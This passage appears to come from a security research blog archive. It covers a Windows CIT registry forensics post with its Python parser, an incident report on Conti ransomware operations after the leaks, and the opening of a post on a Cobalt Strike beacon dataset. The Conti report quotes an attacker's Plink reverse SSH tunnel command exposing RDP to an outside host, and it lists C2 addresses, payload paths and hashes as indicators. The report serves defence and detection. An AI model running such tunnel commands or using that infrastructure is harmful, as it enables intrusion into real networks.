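    """Convert 100 ns ticks since 1601-01-01 UTC to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def filetime_from_value(raw: bytes) -> datetime:
    # ASSUMPTION: the registry value holds a raw 8-byte little-endian FILETIME
    (ticks,) = struct.unpack("<Q", raw[:8])
    return filetime_to_datetime(ticks)


# 116444736000000000 ticks is the well-known FILETIME of the Unix epoch.
unix_epoch = filetime_from_value(struct.pack("<Q", 116444736000000000))
```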

These values are written by ahcache.sys, function CitmpLogUsageWorker. This function is called from CitmpLoadImageCallback, which subsequently is the callback function provided to PsSetLoadImageNotifyRoutine. The MSDN page for this function says that this call registers a “driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory)”. This callback checks a couple of conditions. First, it checks if the module is loaded from a system partition, by checking the DO_SYSTEM_SYSTEM_PARTITION flag of the underlying device. Then it checks if the image it’s loading is from a set of tracked modules. This list is optionally read from the registry key HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatCache and value Citm, but has a default list to fall back to. The version of ahcache.sys that I analysed contained:

  • \System32\mrt100.dll
  • Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
  • Microsoft.NET\Framework\v1.0.3705\mscorsvr.dll
  • Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
  • Microsoft.NET\Framework\v1.1.4322\mscorsvr.dll
  • Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
  • \Microsoft.NET\Framework\v4.0.30319\clr.dll
  • \Microsoft.NET\Framework64\v4.0.30319\clr.dll
  • \Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll

The tracked module path is concatenated to the aforementioned registry key to, for example, result in the key HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v1.0.3705/mscorwks.dll. Note the replaced path separators to not conflict with the registry path separator. It does a final check if there are not more than 64 values already in this key, or if the ImageFileName of the executable exceeds 520 characters. In the first case, the current system time is stored in the OverflowQuota value. In the second case, the value name OverflowValue is used.
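The key naming and the final checks can be sketched as below. This is an interpretation of the behaviour described above, not a transcription of ahcache.sys: the exact comparison boundaries and the order of the two checks are assumptions, and both function names are hypothetical.

```python
MODULE_KEY = r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module"


def module_subkey(tracked_module_path: str) -> str:
    """Build the registry key for a tracked module, swapping \\ for /."""
    return MODULE_KEY + "\\" + tracked_module_path.strip("\\").replace("\\", "/")


def value_name_for(image_file_name: str, existing_value_count: int) -> str:
    """Pick the value name that receives the current timestamp."""
    # ASSUMPTION: "more than 64 values" and "exceeds 520 characters" are strict
    if existing_value_count > 64:
        return "OverflowQuota"
    if len(image_file_name) > 520:
        return "OverflowValue"
    return image_file_name


key = module_subkey("Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll")
```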

So far I haven’t found anything that actually removes values from this registry key, so OverflowQuota effectively contains the timestamp of the most recent load of that module by an executable after the key already held more than 64 values. If these values are indeed never removed, it unfortunately means that these registry keys only contain the first 64 executables to load these modules.

This behaviour seems to be present from Windows 10 onwards.

Summary

We showed how to parse the CIT database and provided some additional information on what it stores. The information presented may not be perfect, but this was just a couple of days’ worth of research into CIT. We hope it’s useful to some and perhaps also a showcase of a method to quickly research topics like these.

We also discovered the lack of the CIT database on newer Windows versions, and these new DP and PUUActive values. We provided some information on what these structures contain and structure definitions to easily parse them.

Finally, we also provide code to parse the CIT database yourself. It’s just the code to parse the CIT contents and doesn’t do anything to access the registry. There’s also no code to parse the other mentioned registry keys, since registry access is very implementation specific between investigation tools, and the values are quite trivial to parse out. We have implemented all of these findings into our investigation framework, which enables us to use them on all types of evidence data that we encounter.

We invite anyone curious on this topic to provide feedback and information for anything we may have missed or misinterpreted.

Source

#!/usr/bin/env python3
import array
import argparse
import io
import struct
import sys
from binascii import crc32
from datetime import datetime, timedelta, timezone

try:
    from dissect import cstruct
    from Registry import Registry
except ImportError:
    print("Missing dependencies, run:\npip install dissect.cstruct python-registry")
    sys.exit(1)

try:
    from zoneinfo import ZoneInfo

    HAS_ZONEINFO = True
except ImportError:
    HAS_ZONEINFO = False
cit_def = """
typedef QWORD FILETIME;
flag TELEMETRY_ANSWERS {
POWERBROADCAST = 0x10000,
DEVICECHANGE = 0x20000,
IME_CONTROL = 0x40000,
WINHELP = 0x80000,
};
typedef struct _CIT_HEADER {
WORD MajorVersion;
WORD MinorVersion;
DWORD Size; /* Size of the entire buffer */
FILETIME CurrentTimeLocal; /* Maybe the time when the saved CIT was last updated? */
DWORD Crc32; /* Crc32 of the entire buffer, skipping this field */
DWORD EntrySize;
DWORD EntryCount;
DWORD EntryDataOffset;
DWORD SystemDataSize;
DWORD SystemDataOffset;
DWORD BaseUseDataSize;
DWORD BaseUseDataOffset;
FILETIME StartTimeLocal; /* Presumably when the aggregation started */
FILETIME PeriodStartLocal; /* Presumably the starting point of the aggregation period */
DWORD AggregationPeriodInS; /* Presumably the duration over which this data was gathered
* Always 604800 (7 days) */
DWORD BitPeriodInS; /* Presumably the amount of seconds a single bit represents
* Always 3600 (1 hour) */
DWORD SingleBitmapSize; /* This appears to be the sizes of the Stats buffers, always 21 */
DWORD _Unk0; /* Always 0x00000100? */
DWORD HeaderSize;
DWORD _Unk1; /* Always 0x00000000? */
} CIT_HEADER;
typedef struct _CIT_PERSISTED {
DWORD BitmapsOffset; /* Array of Offset and Size (DWORD, DWORD) */
DWORD BitmapsSize;
DWORD SpanStatsOffset; /* Array of Count and Duration (DWORD, DWORD) */
DWORD SpanStatsSize;
DWORD StatsOffset; /* Array of WORD */
DWORD StatsSize;
} CIT_PERSISTED;
typedef struct _CIT_ENTRY {
DWORD ProgramDataOffset; /* Offset to CIT_PROGRAM_DATA */
DWORD UseDataOffset; /* Offset to CIT_PERSISTED */
DWORD ProgramDataSize;
DWORD UseDataSize;
} CIT_ENTRY;
typedef struct _CIT_PROGRAM_DATA {
DWORD FilePathOffset; /* Offset to UTF-16-LE file path string */
DWORD FilePathSize; /* strlen of string */
DWORD CommandLineOffset; /* Offset to UTF-16-LE command line string */
DWORD CommandLineSize; /* strlen of string */
DWORD PeTimeDateStamp; /* aka Extra1 */
DWORD PeCheckSum; /* aka Extra2 */
DWORD Extra3; /* aka Extra3, some flag from PROCESSINFO struct */
} CIT_PROGRAM_DATA;
typedef struct _CIT_BITMAP_ITEM {
DWORD Offset;
DWORD Size;
} CIT_BITMAP_ITEM;
typedef struct _CIT_SPAN_STAT_ITEM {
DWORD Count;
DWORD Duration;
} CIT_SPAN_STAT_ITEM;
typedef struct _CIT_SYSTEM_DATA_SPAN_STATS {
CIT_SPAN_STAT_ITEM ContextFlushes0;
CIT_SPAN_STAT_ITEM Foreground0;
CIT_SPAN_STAT_ITEM Foreground1;
CIT_SPAN_STAT_ITEM DisplayPower0;
CIT_SPAN_STAT_ITEM DisplayRequestChange;
CIT_SPAN_STAT_ITEM DisplayPower1;
CIT_SPAN_STAT_ITEM DisplayPower2;
CIT_SPAN_STAT_ITEM DisplayPower3;
CIT_SPAN_STAT_ITEM ContextFlushes1;
CIT_SPAN_STAT_ITEM Foreground2;
CIT_SPAN_STAT_ITEM ContextFlushes2;
} CIT_SYSTEM_DATA_SPAN_STATS;
typedef struct _CIT_USE_DATA_SPAN_STATS {
CIT_SPAN_STAT_ITEM ProcessCreation0;
CIT_SPAN_STAT_ITEM Foreground0;
CIT_SPAN_STAT_ITEM Foreground1;
CIT_SPAN_STAT_ITEM Foreground2;
CIT_SPAN_STAT_ITEM ProcessSuspended;
CIT_SPAN_STAT_ITEM ProcessCreation1;
} CIT_USE_DATA_SPAN_STATS;
typedef struct _CIT_SYSTEM_DATA_STATS {
WORD Unknown_BootIdRelated0;
WORD Unknown_BootIdRelated1;
WORD Unknown_BootIdRelated2;
WORD Unknown_BootIdRelated3;
WORD Unknown_BootIdRelated4;
WORD SessionConnects;
WORD ProcessForegroundChanges;
WORD ContextFlushes;
WORD MissingProgData;
WORD DesktopSwitches;
WORD WinlogonMessage;
WORD WinlogonLockHotkey;
WORD WinlogonLock;
WORD SessionDisconnects;
} CIT_SYSTEM_DATA_STATS;
typedef struct _CIT_USE_DATA_STATS {
WORD Crashes;
WORD ThreadGhostingChanges;
WORD Input;
WORD InputKeyboard;
WORD Unknown;
WORD InputTouch;
WORD InputHid;
WORD InputMouse;
WORD MouseLeftButton;
WORD MouseRightButton;
WORD MouseMiddleButton;
WORD MouseWheel;
} CIT_USE_DATA_STATS;
// PUU
typedef struct _CIT_POST_UPDATE_USE_INFO {
DWORD UpdateKey;
WORD UpdateCount;
WORD CrashCount;
WORD SessionCount;
WORD LogCount;
DWORD UserActiveDurationInS;
DWORD UserOrDispActiveDurationInS;
DWORD DesktopActiveDurationInS;
WORD Version;
WORD _Unk0;
WORD BootIdMin;
WORD BootIdMax;
DWORD PMUUKey;
DWORD SessionDurationInS;
DWORD SessionUptimeInS;
DWORD UserInputInS;
DWORD MouseInputInS;
DWORD KeyboardInputInS;
DWORD TouchInputInS;
DWORD PrecisionTouchpadInputInS;
DWORD InForegroundInS;
DWORD ForegroundSwitchCount;
DWORD UserActiveTransitionCount;
DWORD _Unk1;
FILETIME LogTimeStart;
QWORD CumulativeUserActiveDurationInS;
WORD UpdateCountAccumulationStarted;
WORD _Unk2;
DWORD BuildUserActiveDurationInS;
DWORD BuildNumber;
DWORD _UnkDeltaUserOrDispActiveDurationInS;
DWORD _UnkDeltaTime;
DWORD _Unk3;
} CIT_POST_UPDATE_USE_INFO;
// DP
typedef struct _CIT_DP_MEMOIZATION_ENTRY {
DWORD Unk0;
DWORD Unk1;
DWORD Unk2;
} CIT_DP_MEMOIZATION_ENTRY;
typedef struct _CIT_DP_MEMOIZATION_CONTEXT {
_CIT_DP_MEMOIZATION_ENTRY Entries[12];
} CIT_DP_MEMOIZATION_CONTEXT;
typedef struct _CIT_DP_DATA {
WORD Version;
WORD Size;
WORD LogCount;
WORD CrashCount;
DWORD SessionCount;
DWORD UpdateKey;
QWORD _Unk0;
FILETIME _UnkTime;
FILETIME LogTimeStart;
DWORD ForegroundDurations[11];
DWORD _Unk1;
_CIT_DP_MEMOIZATION_CONTEXT MemoizationContext;
} CIT_DP_DATA;
"""
c_cit = cstruct.cstruct()
c_cit.load(cit_def)
class CIT:
    def __init__(self, buf):
        compressed_fh = io.BytesIO(buf)
        # The value starts with two little-endian DWORDs: compressed and uncompressed size
        compressed_size, uncompressed_size = struct.unpack("<2I", compressed_fh.read(8))

        self.buf = lznt1_decompress(compressed_fh)

        self.header = c_cit.CIT_HEADER(self.buf)
        if self.header.MajorVersion != 0x0A:
            raise ValueError("Unsupported CIT version")

        # The CRC32 covers the whole buffer except the 4-byte Crc32 field at 0x10
        digest = crc32(self.buf[0x14:], crc32(self.buf[:0x10]))
        if self.header.Crc32 != digest:
            raise ValueError("Crc32 mismatch")

        system_data_buf = self.data(self.header.SystemDataOffset, self.header.SystemDataSize, 0x18)
        self.system_data = SystemData(self, c_cit.CIT_PERSISTED(system_data_buf))

        base_use_data_buf = self.data(self.header.BaseUseDataOffset, self.header.BaseUseDataSize, 0x18)
        self.base_use_data = BaseUseData(self, c_cit.CIT_PERSISTED(base_use_data_buf))

        entry_data = self.buf[self.header.EntryDataOffset :]
        self.entries = [Entry(self, entry) for entry in c_cit.CIT_ENTRY[self.header.EntryCount](entry_data)]

    def data(self, offset, size, expected_size=None):
        if expected_size and size > expected_size:
            size = expected_size

        data = self.buf[offset : offset + size]

        if expected_size and size < expected_size:
            # Zero-pad short buffers so the fixed-size structures can still be parsed
            data = data.ljust(expected_size, b"\x00")

        return data

    def iter_bitmap(self, bitmap: bytes):
        bit_delta = timedelta(seconds=self.header.BitPeriodInS)
        ts = wintimestamp(self.header.PeriodStartLocal)

        for byte in bitmap:
            # Iterating over bytes yields integers, so compare against 0
            if byte == 0:
                ts += 8 * bit_delta
            else:
                for bit in range(8):
                    if byte & (1 << bit):
                        yield ts
                    ts += bit_delta
class Entry:
    def __init__(self, cit, entry):
        self.cit = cit
        self.entry = entry

        program_buf = cit.data(entry.ProgramDataOffset, entry.ProgramDataSize, 0x1C)
        self.program_data = c_cit.CIT_PROGRAM_DATA(program_buf)

        use_data_buf = cit.data(entry.UseDataOffset, entry.UseDataSize, 0x18)
        self.use_data = ProgramUseData(cit, c_cit.CIT_PERSISTED(use_data_buf))

        self.file_path = None
        self.command_line = None

        # Sizes are stored in UTF-16 characters, hence the multiplication by 2
        if self.program_data.FilePathOffset:
            file_path_buf = cit.data(self.program_data.FilePathOffset, self.program_data.FilePathSize * 2)
            self.file_path = file_path_buf.decode("utf-16-le")

        if self.program_data.CommandLineOffset:
            command_line_buf = cit.data(self.program_data.CommandLineOffset, self.program_data.CommandLineSize * 2)
            self.command_line = command_line_buf.decode("utf-16-le")

    def __repr__(self):
        return f"<Entry file_path={self.file_path!r} command_line={self.command_line!r}>"
class BaseUseData:
    MIN_BITMAPS_SIZE = 0x8
    MIN_SPAN_STATS_SIZE = 0x30
    MIN_STATS_SIZE = 0x18

    def __init__(self, cit, entry):
        self.cit = cit
        self.entry = entry

        bitmap_items = c_cit.CIT_BITMAP_ITEM[entry.BitmapsSize // len(c_cit.CIT_BITMAP_ITEM)](
            cit.data(entry.BitmapsOffset, entry.BitmapsSize, self.MIN_BITMAPS_SIZE)
        )
        bitmaps = [cit.data(item.Offset, item.Size) for item in bitmap_items]
        self.bitmaps = self._parse_bitmaps(bitmaps)
        self.span_stats = self._parse_span_stats(
            cit.data(entry.SpanStatsOffset, entry.SpanStatsSize, self.MIN_SPAN_STATS_SIZE)
        )
        self.stats = self._parse_stats(cit.data(entry.StatsOffset, entry.StatsSize, self.MIN_STATS_SIZE))

    def _parse_bitmaps(self, bitmaps):
        return BaseUseDataBitmaps(self.cit, bitmaps)

    def _parse_span_stats(self, span_stats_data):
        return None

    def _parse_stats(self, stats_data):
        return None


class BaseUseDataBitmaps:
    def __init__(self, cit, bitmaps):
        self.cit = cit
        self._bitmaps = bitmaps

    def _parse_bitmap(self, idx):
        return list(self.cit.iter_bitmap(self._bitmaps[idx]))
class SystemData(BaseUseData):
    MIN_BITMAPS_SIZE = 0x30
    MIN_SPAN_STATS_SIZE = 0x58
    MIN_STATS_SIZE = 0x1C

    def _parse_bitmaps(self, bitmaps):
        return SystemDataBitmaps(self.cit, bitmaps)

    def _parse_span_stats(self, span_stats_data):
        return c_cit.CIT_SYSTEM_DATA_SPAN_STATS(span_stats_data)

    def _parse_stats(self, stats_data):
        return c_cit.CIT_SYSTEM_DATA_STATS(stats_data)


class SystemDataBitmaps(BaseUseDataBitmaps):
    def __init__(self, cit, bitmaps):
        super().__init__(cit, bitmaps)
        self.display_power = self._parse_bitmap(0)
        self.display_request_change = self._parse_bitmap(1)
        self.input = self._parse_bitmap(2)
        self.input_touch = self._parse_bitmap(3)
        self.unknown = self._parse_bitmap(4)
        self.foreground = self._parse_bitmap(5)


class ProgramUseData(BaseUseData):
    def _parse_bitmaps(self, bitmaps):
        return ProgramDataBitmaps(self.cit, bitmaps)

    def _parse_span_stats(self, span_stats_data):
        return c_cit.CIT_USE_DATA_SPAN_STATS(span_stats_data)

    def _parse_stats(self, stats_data):
        return c_cit.CIT_USE_DATA_STATS(stats_data)


class ProgramDataBitmaps(BaseUseDataBitmaps):
    def __init__(self, cit, use_data):
        super().__init__(cit, use_data)
        self.foreground = self._parse_bitmap(0)
# Some inlined utility functions for the purpose of the POC
def wintimestamp(ts, tzinfo=timezone.utc):
    # This is a slower method of calculating Windows timestamps, but works on both Windows and Unix platforms
    # Performance is not an issue for this POC
    # FILETIME counts 100ns intervals since 1601-01-01; 11644473600 is the offset to the Unix epoch in seconds
    return datetime(1970, 1, 1, tzinfo=tzinfo) + timedelta(seconds=float(ts) * 1e-7 - 11644473600)


# LZNT1 derived from https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/filesystems/lznt1.py
def _get_displacement(offset):
    """Calculate the displacement."""
    result = 0
    while offset >= 0x10:
        offset >>= 1
        result += 1

    return result


DISPLACEMENT_TABLE = array.array("B", [_get_displacement(x) for x in range(8192)])

COMPRESSED_MASK = 1 << 15
SIGNATURE_MASK = 3 << 12
SIZE_MASK = (1 << 12) - 1
TAG_MASKS = [(1 << i) for i in range(0, 8)]
def lznt1_decompress(src):
    """LZNT1 decompress from a file-like object.

    Args:
        src: File-like object to decompress from.

    Returns:
        bytes: The decompressed bytes.
    """
    offset = src.tell()
    src.seek(0, io.SEEK_END)
    size = src.tell() - offset
    src.seek(offset)

    dst = io.BytesIO()

    while src.tell() - offset < size:
        block_offset = src.tell()
        uncompressed_chunk_offset = dst.tell()

        block_header = struct.unpack("<H", src.read(2))[0]
        if block_header & SIGNATURE_MASK != SIGNATURE_MASK:
            break

        hsize = block_header & SIZE_MASK

        block_end = block_offset + hsize + 3

        if block_header & COMPRESSED_MASK:
            while src.tell() < block_end:
                # Each tag byte describes the next eight tokens: literal or back-reference
                header = ord(src.read(1))
                for mask in TAG_MASKS:
                    if src.tell() >= block_end:
                        break

                    if header & mask:
                        pointer = struct.unpack("<H", src.read(2))[0]
                        displacement = DISPLACEMENT_TABLE[dst.tell() - uncompressed_chunk_offset - 1]

                        symbol_offset = (pointer >> (12 - displacement)) + 1
                        symbol_length = (pointer & (0xFFF >> displacement)) + 3

                        # Seek backwards from the end of the output to the referenced data
                        dst.seek(-symbol_offset, io.SEEK_END)
                        data = dst.read(symbol_length)

                        # Pad the data to make it fit.
                        if 0 < len(data) < symbol_length:
                            data = data * (symbol_length // len(data) + 1)
                            data = data[:symbol_length]

                        dst.seek(0, io.SEEK_END)

                        dst.write(data)
                    else:
                        data = src.read(1)
                        dst.write(data)

        else:
            # Block is not compressed
            data = src.read(hsize + 1)
            dst.write(data)

    result = dst.getvalue()
    return result
def print_bitmap(name, bitmap, indent=8):
    print(f"{' ' * indent}{name}:")
    for entry in bitmap:
        print(f"{' ' * (indent + 4)}{entry}")


def print_span_stats(span_stats, indent=8):
    for key, value in span_stats._values.items():
        print(f"{' ' * indent}{key}: {value.Count} times, {value.Duration}ms")


def print_stats(stats, indent=8):
    for key, value in stats._values.items():
        print(f"{' ' * indent}{key}: {value}")
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("input", type=argparse.FileType("rb"), help="path to SOFTWARE hive file")
    parser.add_argument("--tz", default="UTC", help="timezone to use for parsing local timestamps")
    args = parser.parse_args()

    if not HAS_ZONEINFO:
        print("[!] zoneinfo module not available, falling back to UTC")
        tz = timezone.utc
    else:
        tz = ZoneInfo(args.tz)

    hive = Registry.Registry(args.input)

    try:
        cit_key = hive.open("Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\System")
    except Registry.RegistryKeyNotFoundException:
        parser.exit("No CIT\\System key found in the hive specified!")

    for cit_value in cit_key.values():
        data = cit_value.value()

        # Skip values too small to hold anything beyond the 8-byte size header
        if len(data) <= 8:
            continue

        print(f"Parsing {cit_value.name()}")
        cit = CIT(data)
        print("Period start:", wintimestamp(cit.header.PeriodStartLocal, tz))
        print("Start time:", wintimestamp(cit.header.StartTimeLocal, tz))
        print("Current time:", wintimestamp(cit.header.CurrentTimeLocal, tz))
        print("Bit period in hours:", cit.header.BitPeriodInS // 60 // 60)
        print("Aggregation period in hours:", cit.header.AggregationPeriodInS // 60 // 60)
        print()

        print("System:")
        print("    Bitmaps:")
        print_bitmap("Display power", cit.system_data.bitmaps.display_power)
        print_bitmap("Display request change", cit.system_data.bitmaps.display_request_change)
        print_bitmap("Input", cit.system_data.bitmaps.input)
        print_bitmap("Input (touch)", cit.system_data.bitmaps.input_touch)
        print_bitmap("Unknown", cit.system_data.bitmaps.unknown)
        print_bitmap("Foreground", cit.system_data.bitmaps.foreground)
        print("    Span stats:")
        print_span_stats(cit.system_data.span_stats)
        print("    Stats:")
        print_stats(cit.system_data.stats)
        print()

        for i, entry in enumerate(cit.entries):
            print(f"Entry {i}:")
            print("    File path:", entry.file_path)
            print("    Command line:", entry.command_line)
            print("    PE TimeDateStamp", datetime.fromtimestamp(entry.program_data.PeTimeDateStamp, tz=timezone.utc))
            print("    PE CheckSum", hex(entry.program_data.PeCheckSum))
            print("    Extra 3:", entry.program_data.Extra3)
            print("    Bitmaps:")
            print_bitmap("Foreground", entry.use_data.bitmaps.foreground)
            print("    Span stats:")
            print_span_stats(entry.use_data.span_stats)
            print("    Stats:")
            print_stats(entry.use_data.stats)
            print()


if __name__ == "__main__":
    main()

Public Report – Google Enterprise API Security Assessment

7 April 2022 at 20:06

During the autumn of 2021, Google engaged NCC Group to perform a review of the Android 12 Enterprise API to evaluate its compliance with the Security Technical Implementation Guides (STIG) matrix provided by Google.

This assessment was also performed with reference to the Common Criteria Protection Profile for Mobile Device Fundamentals (PPMDF), from which the STIG was derived.

Due to the limited nature of the testing, certain elements of the STIG requirements are expected to be covered separately either via FIPS 140-2 or Common Criteria Evaluation.

The Public Report for this review may be downloaded below:

Conti-nuation: methods and techniques observed in operations post the leaks

Authored by: Nikolaos Pantazopoulos, Alex Jessop and Simon Biggs

Executive Summary

In February 2022, a Twitter account using the handle ‘ContiLeaks’ started to publicly release information about the operations of the cybercrime group behind the Conti ransomware. The leaked data included private conversations between members along with the source code of various panels and tools (e.g. the Team9 backdoor panel [1]). Furthermore, even though the leaks appeared to focus on the people behind the Conti operations, the leaked data confirmed (at least publicly) that the Conti operators are part of the group that operates under the ‘TheTrick’ ecosystem. For the past few months, there had been a common misconception that Conti was a different entity.

Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware. This post describes the methods and techniques we observed during recent incidents that took place after the Conti data leaks.

Our findings can be summarised as below:

  • Multiple different initial access vectors have been observed.
  • The operator(s) use service accounts of the victim’s Antivirus product in order to laterally move through the estate and deploy the ransomware.
  • After getting access, the operator(s) attempted to remove the installed Antivirus product through the execution of batch scripts.
  • To achieve persistence in the compromised hosts, multiple techniques were observed:
    • Service created for the execution of Cobalt Strike.
    • Multiple legitimate remote access tools, ‘AnyDesk’, ‘Splashtop’ and ‘Atera’, were deployed. (Note: This has been reported in the past too by different vendors)
    • Local admin account ‘Crackenn’ created. (Note: This has been previously reported by Truesec as a Conti behaviour [2])
  • Before starting the ransomware activity, the operators exfiltrated data from the network with the legitimate software ‘Rclone’ [3].

It should be noted that the threat actor(s) might use different tools or techniques in some stages of the compromise.

Initial Access

Multiple initial access vectors have been observed recently: phishing emails and the exploitation of Microsoft Exchange servers. The phishing email, delivered to an employee, proceeded to deploy Qakbot to the user’s Citrix session. The targeting of Microsoft Exchange saw the ProxyShell and ProxyLogon vulnerabilities exploited. When this vector was observed, the compromise of the Exchange servers often took place two to three months prior to the post-exploitation phase. This behaviour suggests that the team responsible for gaining initial access compromised a large number of estates in a small timeframe.

In a number of engagements, it was not possible to ascertain the initial access vector due to dwell time and evidence retention. However, other initial access vectors utilised by the Conti operator(s) are:

  • Credential brute-force
  • Use of publicly available exploits. We have observed the following exploits being used:
    • Fortigate VPN
      • CVE-2018-13379
      • CVE-2018-13374
    • Log4Shell
      • CVE-2021-44228
  • Phishing e-mail sent by a legitimate compromised account.

Lateral Movement

In one incident, after gaining access to the first compromised host, we observed the threat actor carrying out the following actions:

  • Download AnyDesk from hxxps://37.221.113[.]100/anydesk.exe
  • Deployment of the following batch files:
    • 1.bat, 2.bat, 111.bat
      • Ransomware propagation
    • Removesophos.bat, uninstallSophos.bat
      • Uninstalls Sophos Antivirus solution
    • Aspx.bat
      • Contains a command-line, which executes the dropped executable file ‘ekern.exe’.
      • ‘ekern.exe’ is a command line connection tool known as Plink [4]
      • This file establishes a reverse SSH tunnel that allows direct RDP connection to the compromised host.
      • ekern.exe -ssh -P 53 -l redacted-pw redacted -R REDACTED_IP:59000:127.0.0.1:3389

After executing the above files, we observed the following utilities being used for reconnaissance and movement:

  • RDP
  • ADFind
  • Bloodhound to identify the network topology.
  • netscan.exe for network shares discovery.
  • Cobalt Strike deployed allowing the threat actor to laterally move throughout the network.

The common techniques across the multiple Conti engagements are the use of RDP and Cobalt Strike.

Persistence

The threat actor leveraged Windows services as the primary persistence method for the Cobalt Strike beacon. An example can be observed below:

A service was installed in the system.

Service Name: REDACTED

Service File Name: cmd.exe /c C:\ProgramData\1.msi

Service Type: user mode service

Service Start Type: demand start

Service Account: LocalSystem

In addition, services were also installed to provide persistence for the Remote Access Tools deployed by the threat actor:

  • AnyDesk
  • Splashtop
  • Atera

Another Conti engagement saw no methods of persistence. However, a temporary service was created to execute Cobalt Strike. It is hypothesized that the threat actor planned to achieve their objective quickly and therefore used services for execution rather than persistence.

In a separate engagement, where the initial access vector was phishing and led to the deployment of Qakbot, the threat actor proceeded to create a local admin account named ‘Crackenn’ for persistence on the host.

Privilege Escalation

Conti operator(s) managed to escalate their privileges by compromising and using different accounts that were found on the compromised host. In multiple engagements, the credentials were compromised by deploying tools such as Mimikatz.

One operator was also observed exploiting ZeroLogon to obtain credentials and move laterally.

Exfiltration and Encryption

Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software ‘Rclone’. ‘Rclone’ was configured to upload to either the Mega cloud storage provider or a threat actor controlled server. Soon after the data exfiltration, the threat actor(s) started the data encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days.

As discussed earlier, the average dwell time of a Conti compromise is heavily dependent on the initial access method. In those incidents that involved ProxyShell and ProxyLogon, the time between initial access and lateral movement was three to six months. However, once lateral movement is conducted, the time to completing their objective is a matter of days.

Recommendations

  • Monitor firewalls for traffic categorised as filesharing
  • Monitor firewalls for anomalous spikes in data leaving the network
  • Patch externally facing services immediately
  • Monitor installed software for remote access tools
  • Restrict RDP and SMB access between hosts
  • Implement a Robust Password Policy [5]
  • Provide regular security awareness training

Indicators of Compromise

| Indicator Value | Indicator Type | Description |
|---|---|---|
| 37.221.113[.]100/anydesk.exe | IP Address | Hosts AnyDesk |
| 103.253.208[.]79 | IP Address | Cobalt Strike command-and-control server |
| C:\ProgramData\1.msi | Filename | Cobalt Strike payload |
| C:\ProgramData\1.dll | Filename | Cobalt Strike payload |
| 223.29.205[.]54 | IP Address | AnyDesk IP address of the operator. |
| C:\Windows\sv.exe | Filename | Rclone |
| C:\Windows\svchost.conf | Filename | Rclone config |
| E03AF25994222D4DC6EFD98AE65217A03A5B40EEDCFFAC45F098E2A6F68F3F41 | SHA256 | Sv.exe – Rclone |
| C:\Users\Public\Report_18.xls | Filename | Cobalt Strike payload |
| C:\Users\Public\x86_16.dll | Filename | Cobalt Strike payload |
| Crackenn | Account | Local admin account created on patient zero |
| C:\Users\<user>\AppData\Roaming\Microsoft\Abevi\<random characters>.dll | Filename | Qakbot payload |
| C:\Users\Public\AdFind.exe | Filename | ADFind |
| 23.82.140[.]234 | IP Address | Cobalt Strike command-and-control server |
| 23.81.246[.]179 | IP Address | Cobalt Strike command-and-control server |
| hijelurusa[.]com | Domain | Cobalt Strike command-and-control server |

References

  1. https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/
  2. https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks
  3. https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
  4. https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html
  5. https://www.ncsc.gov.uk/collection/passwords/updating-your-approach

Whitepaper – Double Fetch Vulnerabilities in C and C++

28 March 2022 at 13:00

Double fetch vulnerabilities in C and C++ have been known about for a number of years. However, they can appear in multiple forms and can have varying outcomes. As much of this information is spread across various sources, this whitepaper draws the knowledge together into a single place, in order to better describe the different types of the vulnerability, how each type occurs, and the appropriate fixes.

This whitepaper may be downloaded below:


[Editor’s note: This whitepaper was updated on March 29th 2022 to correct minor formatting issues with the prior version.]

Mining data from Cobalt Strike beacons

25 March 2022 at 16:18

Since we published about identifying Cobalt Strike Team Servers in the wild just over three years ago, we’ve collected over 128,000 beacons from over 24,000 active Team Servers. Today, RIFT is making this extensive beacon dataset publicly available in combination with the open-source release of dissect.cobaltstrike, our Python library for studying and parsing Cobalt Strike related data.

The published dataset contains historical beacon metadata ranging from 2018 to 2022. This blog will highlight some interesting findings you can extract and query from this extensive dataset. We encourage other researchers also to explore the dataset and share exciting results with the community.

Cobalt Strike Beacon dataset

The dataset beacons.jsonl.gz is a GZIP compressed file containing 128,340 rows of beacon metadata as JSON-lines. You can download it from the following repository and make sure to also check out the accompanying Jupyter notebook:

The dataset spans almost four years of historical Cobalt Strike beacon metadata from July 2018 until February 2022. Unfortunately, we lost five months’ worth of data in 2019 due to archiving issues. In addition, the dataset mainly focuses on x86 beacons collected from active Team Servers on HTTP port 80, 443 and DNS; therefore, it does not contain any beacons from other sources, such as VirusTotal.

The beacon payloads themselves are not in the dataset due to the size. Instead, the different beacon configuration settings are stored, including other metadata such as:

  • Date the beacon was collected and from which IP address and port
  • GeoIP + ASN metadata
  • TLS certificate in DER format
  • PE information (timestamps, magic_mz, magic_pe, stage_prepend, stage_append)
  • If the payload was XOR encoded, and which XOR key was used for config obfuscation
  • The raw beacon configuration bytes; handy if you want to parse the beacon config manually. (e.g. using dissect.cobaltstrike or another parser of choice)
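
Because the dataset is a GZIP-compressed JSON-lines file, it can be streamed row by row with the Python standard library alone. The following is a minimal sketch, assuming the file has been downloaded locally; the helper names `iter_beacons` and `count_field` are hypothetical and not part of dissect.cobaltstrike, and the only field name used in the usage note below is `beacon_version`, which this post mentions later.

```python
import gzip
import json
from collections import Counter


def iter_beacons(path):
    """Yield one dict per non-empty line of a gzip-compressed JSON-lines file."""
    with gzip.open(path, "rt", encoding="utf-8") as fh:
        for line in fh:
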